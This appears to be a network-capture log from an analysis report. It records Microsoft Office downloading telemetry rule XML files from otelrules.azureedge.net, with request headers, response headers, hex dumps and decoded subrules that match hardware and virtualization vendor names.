                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              71192.168.2.64978413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:44 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:45 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                              ETag: "0x8DC582BB556A907"
                                                                                                                                                                              x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073045Z-178bfbc474b9xljthC1NYCtw9400000001200000000081xw
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              72192.168.2.64978513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:45 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:45 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 502
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                              ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                              x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073045Z-178bfbc474bmqmgjhC1NYCy16c000000015000000000cvrk
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:45 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              73192.168.2.64978613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:45 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:46 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                              ETag: "0x8DC582B9D30478D"
                                                                                                                                                                              x-ms-request-id: 733c43f5-901e-007b-0e8c-3aac50000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073046Z-1777c6cb754lv4cqhC1TEB13us0000000aq000000000fert
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              74192.168.2.64978713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:46 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:46 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                              x-ms-request-id: 957844e9-801e-008c-4868-3b7130000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073046Z-178bfbc474btrnf9hC1NYCb80g000000019g000000008hx6
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:46 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              75192.168.2.64978813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:46 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:46 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                              ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                              x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073046Z-178bfbc474bp8mkvhC1NYCzqnn000000012g000000001mfx
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:46 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              76192.168.2.64978913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:47 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:47 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                              x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073047Z-178bfbc474bvjk8shC1NYC83ns00000000x000000000g257
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:47 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              77192.168.2.64979013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:47 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:47 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:47 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                              ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                              x-ms-request-id: 9cc78053-901e-008f-7b8c-3a67a6000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073047Z-1777c6cb754lvj6mhC1TEBke940000000ar000000000naw0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:47 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              78192.168.2.64980013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:48 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:48 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 432
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                              ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                              x-ms-request-id: de17e165-601e-0002-3161-3ba786000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073048Z-178bfbc474bscnbchC1NYCe7eg00000001c0000000002tn9
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:48 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              79192.168.2.64979913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:48 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:48 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                              ETag: "0x8DC582B91EAD002"
                                                                                                                                                                              x-ms-request-id: 00606c4f-d01e-0014-08c3-3bed58000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073048Z-r1d97b99577brct2hC1TEBambg00000003p000000000ce9c
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:48 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              80192.168.2.64980113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:48 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:48 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                              ETag: "0x8DC582BBA740822"
                                                                                                                                                                              x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073048Z-178bfbc474bv7whqhC1NYC1fg4000000015g000000006n8y
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:48 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
